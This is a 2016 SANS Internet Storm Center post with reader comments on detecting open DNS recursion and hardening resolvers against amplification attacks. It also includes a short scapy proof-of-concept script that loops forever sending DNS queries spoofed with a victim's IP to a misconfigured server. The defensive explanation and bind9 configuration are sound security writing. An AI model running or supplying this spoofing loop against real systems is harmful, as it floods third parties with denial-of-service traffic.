Testing for DNS recursion and avoiding being part of DNS amplification attacks

Testing for DNS recursion and avoiding being part of DNS amplification attacks
Yes, it has been said too many times, but still there are too many DNS servers out there allowing recursion to devices outside their network, which could be used for DNS amplification attacks. How? The attacker sends a spoofed DNS request with the victim IP address, usually from a botnet. When the misconfigured DNS answers will send the packet to the victim IP address causing a DDoS attack. How can you test if your DNS allow recursion from the outside? You can use the dns-recursion nmap script: If it's not enabled, you will only get an indication of an open port: How does this attack work? Take a look to the following scenario: A POC for the attack can be easily implemented using the following scapy script, which will be executed by the attacker: #!/usr/bin/python from scapy.all import * victimIP = raw_input("Please enter the IP address for the victim: ") dnsIP = raw_input("Please enter the IP address for the misconfigured DNS: ") while True: send(IP(dst=dnsIP,src=victimIP)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname="www.google.com")),verbose=0) I named this script dnscapy.py. When executed: Got the following packets in the victim side: How can you avoid this attack? If you are using bind9, add the following to the global options, assuming your corporate networks are 10.1.1.0/24 and 10.1.2.0/24: `acl recursiononly { 10.1.1.0/24; 10.1.2.0/24; }; options { allow-query { any; }; allow-recursion { recursiononly; }; };` Manuel Humberto Santander Peláez SANS Internet Storm Center - Handler Twitter: @manuelsantander Web:http://manuel.santander.name e-mail: msantand at isc dot sans dot org	Manuel Humberto Santander Pelaacuteez 193 Posts ISC Handler Jan 4th 2016
Subscribe	Jan 4th 2016 4 years ago
Yep, and while we're on the topic, don't forget to also enable response rate limiting on your non-recursive DNS servers too. Even an authoritative server can be used in an amplification attack.	Brent 123 Posts
Quote	Jan 4th 2016 4 years ago
While we verify "allow-recursion" setting, also check the "allow-transfer" setting to limit DNS zone transfer. The amplification factor from zone transfer can be very much larger than recursive queries.	Mike7 43 Posts
Quote	Jan 5th 2016 4 years ago
Zone transfers are dangerous, but not in amplification attacks since they're TCP based.	Arie 1 Posts
Quote	Jan 6th 2016 4 years ago
What would be the mitigating action for a Windows DNS server?	AAInfoSec 48 Posts
Quote	Jan 7th 2016 4 years ago
Disable DNS Recursion on Microsoft Windows DNS: technet.microsoft.com/en-us/library/…	Xme 532 Posts ISC Handler
Quote	Jan 9th 2016 4 years ago
I disagree. I think that recursion is not the problem. The problem is that: - dns uses udp (tcp too, but only sometimes), - responds can be longer than requests. Of course, recursion helps attacker to ask for long answers, but it's nothing wrong to offer public recursive dns server. The right answer is to limit number of queries and maybe limit size of answers, monitor status and respond to anomalies, limit queries to networks/isps/countries but that's all.	Xme 2 Posts
Quote	Jan 27th 2016 4 years ago